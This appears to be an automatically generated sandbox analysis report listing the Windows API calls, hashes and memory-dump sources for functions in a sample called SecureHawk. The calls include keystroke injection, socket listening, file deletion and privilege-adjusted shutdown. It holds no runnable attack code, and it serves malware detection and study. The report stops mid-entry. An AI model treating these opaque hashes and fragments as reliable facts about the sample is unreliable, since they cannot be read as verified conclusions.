                                  • Opcode Fuzzy Hash: d50717c1c4aa15ecb611afbe291a2a56e616dbcf80d7211da88c3a849c3ac093
                                  • Instruction Fuzzy Hash: 70E14D71204215EFC72ADF25C891E2BBBE8EF89314F04856DF94ADB2A1D734E905CB51
                                  APIs
                                  • __swprintf.LIBCMT ref: 003542BE
                                  • __swprintf.LIBCMT ref: 003542CB
                                    • Part of subcall function 003137FA: __woutput_l.LIBCMT ref: 00313853
                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 003542F5
                                  • LoadResource.KERNEL32(?,00000000), ref: 00354301
                                  • LockResource.KERNEL32(00000000), ref: 0035430E
                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 0035432E
                                  • LoadResource.KERNEL32(?,00000000), ref: 00354340
                                  • SizeofResource.KERNEL32(?,00000000), ref: 0035434F
                                  • LockResource.KERNEL32(?), ref: 0035435B
                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 003543BC
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                  • String ID:
                                  • API String ID: 1433390588-0
                                  • Opcode ID: 9adc8dd7412703adaf0cf0c8d36715c17021c70e9c4ecb39f8a250a2a8ed8bc6
                                  • Instruction ID: 328a669c50486b931956ab2be1ba81e24f206de7a224779ebd794ed93257360a
                                  • Opcode Fuzzy Hash: 9adc8dd7412703adaf0cf0c8d36715c17021c70e9c4ecb39f8a250a2a8ed8bc6
                                  • Instruction Fuzzy Hash: A431C07560021AABCB1A9F61DC48EBB7BACEF48306F014855FD06D6160D770D964CBA0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                  • String ID:
                                  • API String ID: 1737998785-0
                                  • Opcode ID: 75f89ea96b6e179c3ab94cbc591decf651d205510d88a1f73be424978651e672
                                  • Instruction ID: 4f48a4b12217d5512adf43f51dc51d68b6fd3bbfc1cc8855963949055ec7d393
                                  • Opcode Fuzzy Hash: 75f89ea96b6e179c3ab94cbc591decf651d205510d88a1f73be424978651e672
                                  • Instruction Fuzzy Hash: C621C1317013109FDB57AF24EC09B6E77ACEF45760F01C059FA469B2A2DBB0AD118B95
                                  APIs
                                    • Part of subcall function 003101AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00302A58,?,00008000), ref: 003101CF
                                    • Part of subcall function 00354E59: GetFileAttributesW.KERNEL32(?,00353A6B), ref: 00354E5A
                                  • FindFirstFileW.KERNEL32(?,?), ref: 00353C03
                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00353CAB
                                  • MoveFileW.KERNEL32(?,?), ref: 00353CBE
                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00353CDB
                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00353CFD
                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00353D19
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                  • String ID: \*.*
                                  • API String ID: 4002782344-1173974218
                                  • Opcode ID: 68ab04e5d9e5d3d9235c0886be419c2ca2279fbd2b699851943177941a189e4c
                                  • Instruction ID: fa60480bf772f5ee7db67c8f2401bee922a0ef37fd001a125303471baa917cf8
                                  • Opcode Fuzzy Hash: 68ab04e5d9e5d3d9235c0886be419c2ca2279fbd2b699851943177941a189e4c
                                  • Instruction Fuzzy Hash: F751563184114D9ACF17EBA0C9A6DEDB779AF15341F204165E846BB1A2EF316F0DCB60
                                  APIs
                                    • Part of subcall function 00301A36: _memmove.LIBCMT ref: 00301A77
                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0035F8F0
                                  • FindClose.KERNEL32(00000000), ref: 0035FA03
                                    • Part of subcall function 002F52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002F52E6
                                  • Sleep.KERNEL32(0000000A), ref: 0035F920
                                  • _wcscmp.LIBCMT ref: 0035F934
                                  • _wcscmp.LIBCMT ref: 0035F94F
                                  • FindNextFileW.KERNEL32(?,?), ref: 0035F9ED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                  • String ID: *.*
                                  • API String ID: 2185952417-438819550
                                  • Opcode ID: 857690f4ad378d09159bbfe6fadc37a8036464c88656e1507a4891bab42725e5
                                  • Instruction ID: b207391ca83664811905ee5c1d15dcc2ee3c40919b1bf3432c8237c24c43d61e
                                  • Opcode Fuzzy Hash: 857690f4ad378d09159bbfe6fadc37a8036464c88656e1507a4891bab42725e5
                                  • Instruction Fuzzy Hash: 7C417D7194121AAFCF16DF64CC49FEEBBB8FF05315F144166E814A62A1EB309A48CF90
                                  APIs
                                    • Part of subcall function 0034917C: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003491C6
                                    • Part of subcall function 0034917C: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003491F3
                                    • Part of subcall function 0034917C: GetLastError.KERNEL32 ref: 00349200
                                  • ExitWindowsEx.USER32(?,00000000), ref: 00355621
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                  • String ID: $@$SeShutdownPrivilege
                                  • API String ID: 2234035333-194228
                                  • Opcode ID: 6c85050da54d95e2c5685575d1aa3a20b8224e94fa1a753a0381be8bf5a505b0
                                  • Instruction ID: 5a3ffec53540b43a27b0bdc80e34fbdd68e9e430faaa3fa0e419d67583934ed3
                                  • Opcode Fuzzy Hash: 6c85050da54d95e2c5685575d1aa3a20b8224e94fa1a753a0381be8bf5a505b0
                                  • Instruction Fuzzy Hash: 4A017B316907516BF72B5A68DC6AFBB729CDB04343F911420FC07D60F2DA907C0C8591
                                  APIs
                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 0036678C
                                  • WSAGetLastError.WSOCK32(00000000), ref: 0036679B
                                  • bind.WSOCK32(00000000,?,00000010), ref: 003667B7
                                  • listen.WSOCK32(00000000,00000005), ref: 003667C6
                                  • WSAGetLastError.WSOCK32(00000000), ref: 003667E0
                                  • closesocket.WSOCK32(00000000,00000000), ref: 003667F4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                  • String ID:
                                  • API String ID: 1279440585-0
                                  • Opcode ID: 075a837e1009a64d5be98f869a6bc8584f84f01b004cc77695e276459006cb53
                                  • Instruction ID: 77334bf4a790a4ea21771741e0193de647a032b7b209ff9b6762c3ac7b932c2f
                                  • Opcode Fuzzy Hash: 075a837e1009a64d5be98f869a6bc8584f84f01b004cc77695e276459006cb53
                                  • Instruction Fuzzy Hash: F821E4312006049FCB11EF64C986B7EB3ADEF48364F118568F966A73D1CB70AC458B91
                                  APIs
                                    • Part of subcall function 002F29E2: GetWindowLongW.USER32(?,000000EB), ref: 002F29F3
                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 002F1DD6
                                  • GetSysColor.USER32(0000000F), ref: 002F1E2A
                                  • SetBkColor.GDI32(?,00000000), ref: 002F1E3D
                                    • Part of subcall function 002F166C: DefDlgProcW.USER32(?,00000020,?), ref: 002F16B4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ColorProc$LongWindow
                                  • String ID:
                                  • API String ID: 3744519093-0
                                  • Opcode ID: c0a0aeb1e16fcdf584afbc4192b662bef931bc103302e87a98cba51914e0448a
                                  • Instruction ID: bd1c37c5a0ce91bba2eb57f4d68e4ca4ca181e8feb136f687fbf8db3008545ec
                                  • Opcode Fuzzy Hash: c0a0aeb1e16fcdf584afbc4192b662bef931bc103302e87a98cba51914e0448a
                                  • Instruction Fuzzy Hash: B3A1767013542DFAE63E6F299C55E7BB66CDF423C5F94413AF602DA182CA689C318372
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?), ref: 0035C196
                                  • _wcscmp.LIBCMT ref: 0035C1C6
                                  • _wcscmp.LIBCMT ref: 0035C1DB
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0035C1EC
                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0035C21C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                  • String ID:
                                  • API String ID: 2387731787-0
                                  • Opcode ID: 3d200375f4de194e12ffe6a55a72bd22d4ef4bdfce19d47686fa0caac573894a
                                  • Instruction ID: 59df01cfa263543baf30cee015611507360aff018dd9bdedd64339868d9babc2
                                  • Opcode Fuzzy Hash: 3d200375f4de194e12ffe6a55a72bd22d4ef4bdfce19d47686fa0caac573894a
                                  • Instruction Fuzzy Hash: A251BD356147028FD71ADF68D490EAAB3E8FF49324F114A1DF9568B3A1DB30AD08CB91
                                  APIs
                                    • Part of subcall function 0036823D: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00368268
                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00366C4E
                                  • WSAGetLastError.WSOCK32(00000000), ref: 00366C77
                                  • bind.WSOCK32(00000000,?,00000010), ref: 00366CB0
                                  • WSAGetLastError.WSOCK32(00000000), ref: 00366CBD
                                  • closesocket.WSOCK32(00000000,00000000), ref: 00366CD1
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                  • String ID:
                                  • API String ID: 99427753-0
                                  • Opcode ID: 1be30c814999d779c6f9f72392bc82b2933c76ee5294a4accb9107acffb9ff7e
                                  • Instruction ID: 1d764ad63330cd17c87c16531ac4fec961c4c07d84ea02cbc8b3d74f590b15e6
                                  • Opcode Fuzzy Hash: 1be30c814999d779c6f9f72392bc82b2933c76ee5294a4accb9107acffb9ff7e
                                  • Instruction Fuzzy Hash: 1A41F271610604AFDB11BF649C87F7EB3A8DB04794F008568FA56AB3C2CAB09D108FA1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                  • String ID:
                                  • API String ID: 292994002-0
                                  • Opcode ID: 6657fb5b9a36e59a1abe5210b70cd0c2e76843a79961462282e41dd6d43e3d1c
                                  • Instruction ID: 33b97841dcf3ebfa5347472ff545e746046779a116ad18dae481bebc58c1c040
                                  • Opcode Fuzzy Hash: 6657fb5b9a36e59a1abe5210b70cd0c2e76843a79961462282e41dd6d43e3d1c
                                  • Instruction Fuzzy Hash: 7011B232700A15ABE73B5F269C44A2EBB9CEF85760F418029F949D7241CBB4E9018BA1
                                  APIs
                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00361CBA,00000000), ref: 00362891
                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 003628C8
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Internet$AvailableDataFileQueryRead
                                  • String ID:
                                  • API String ID: 599397726-0
                                  • Opcode ID: 7f1d988c1052529c3a670c51cbc0377ab09960d4fdab3ba0b86e26d29f001906
                                  • Instruction ID: 1bc3a359c9b9e057139a9d1538e33652f275f4104954b872eb55a56b5ceb668f
                                  • Opcode Fuzzy Hash: 7f1d988c1052529c3a670c51cbc0377ab09960d4fdab3ba0b86e26d29f001906
                                  • Instruction Fuzzy Hash: 2641E571904B09BFEB22DA55CC85EFB77BCEB40314F12806EFA01A7145DAB19E419A60
                                  APIs
                                    • Part of subcall function 00310F16: std::exception::exception.LIBCMT ref: 00310F4C
                                    • Part of subcall function 00310F16: __CxxThrowException@8.LIBCMT ref: 00310F61
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003491C6
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 003491F3
                                  • GetLastError.KERNEL32 ref: 00349200
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                  • String ID:
                                  • API String ID: 1922334811-0
                                  • Opcode ID: 83aa3900aec5bb5e639ea5156667c88c3812382819bc0635516db9a5d95122fa
                                  • Instruction ID: b43228cd6d141a11834da30aa49ced9b058c25d4cd2c2c141d444380b73a661c
                                  • Opcode Fuzzy Hash: 83aa3900aec5bb5e639ea5156667c88c3812382819bc0635516db9a5d95122fa
                                  • Instruction Fuzzy Hash: 52116DB1414205AFD7299F64DC8AE6BB7ECEB48711B21816EE45597240EB70BC41CB60
                                  APIs
                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 003540DE
                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0035411F
                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0035412A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: CloseControlCreateDeviceFileHandle
                                  • String ID:
                                  • API String ID: 33631002-0
                                  • Opcode ID: cb207d9f5a764c881b85a4a61f5fa3a8fd3f134efa3d40fdb182d2e043d24f67
                                  • Instruction ID: bce12efbd36a038c78580a6c15247cfd247737f6c3c9ad3d9aff61d4a92c4410
                                  • Opcode Fuzzy Hash: cb207d9f5a764c881b85a4a61f5fa3a8fd3f134efa3d40fdb182d2e043d24f67
                                  • Instruction Fuzzy Hash: DC117075E01328BBDB558F959C44FAFBBBCEB45B60F104155FD04E7290D6704A048BA1
                                  APIs
                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00354DB2
                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00354DC9
                                  • FreeSid.ADVAPI32(?), ref: 00354DD9
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                  • String ID:
                                  • API String ID: 3429775523-0
                                  • Opcode ID: 17443e1aac65f24049d97b1142ee035b77b089400bfa22ef4300873fc45e005a
                                  • Instruction ID: 8538669234d2f4083f72259d0c4e334f56a0df8ffce912256cb50889b7c46b5a
                                  • Opcode Fuzzy Hash: 17443e1aac65f24049d97b1142ee035b77b089400bfa22ef4300873fc45e005a
                                  • Instruction Fuzzy Hash: 42F04FB591130CBFDF04DFE0DC89EADB7BCEF08301F1044A9A901E2181D7305A488B50
                                  APIs
                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0035196D
                                  • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00351980
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: InputSendkeybd_event
                                  • String ID:
                                  • API String ID: 3536248340-0
                                  • Opcode ID: 64abaf31fabdb1d248233f0d014e7cbce5967297c442aa0dda02dcaa1637d50a
                                  • Instruction ID: 6e63c8e7c35d0ce0d07993d95834de1c01812de9d4722daaee085672ccef21da
                                  • Opcode Fuzzy Hash: 64abaf31fabdb1d248233f0d014e7cbce5967297c442aa0dda02dcaa1637d50a
                                  • Instruction Fuzzy Hash: 99F0497190420DABDB05CF94C805BFEBBB8EF04315F00804AFD55962A1C3798619DFA4
                                  APIs
                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,0036991A,?,0038098C,?), ref: 0035A547
                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,0036991A,?,0038098C,?), ref: 0035A559
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ErrorFormatLastMessage
                                  • String ID:
                                  • API String ID: 3479602957-0
                                  • Opcode ID: 2d32658c555bdc79cb42354194c5005c8699fb0c2a8fee2d0c60eb59a25905d4
                                  • Instruction ID: 6d696c957bce31237dc5cd65c3815e2dd3c5f32c5c790c2bd3f8822a11582905
                                  • Opcode Fuzzy Hash: 2d32658c555bdc79cb42354194c5005c8699fb0c2a8fee2d0c60eb59a25905d4
                                  • Instruction Fuzzy Hash: C0F0273510132DBBDB22AFA4DC48FEA376CFF0D361F008255F908D6190E6709A04CBA1
                                  APIs
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00348D0A), ref: 00348BE1
                                  • CloseHandle.KERNEL32(?,?,00348D0A), ref: 00348BF3
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
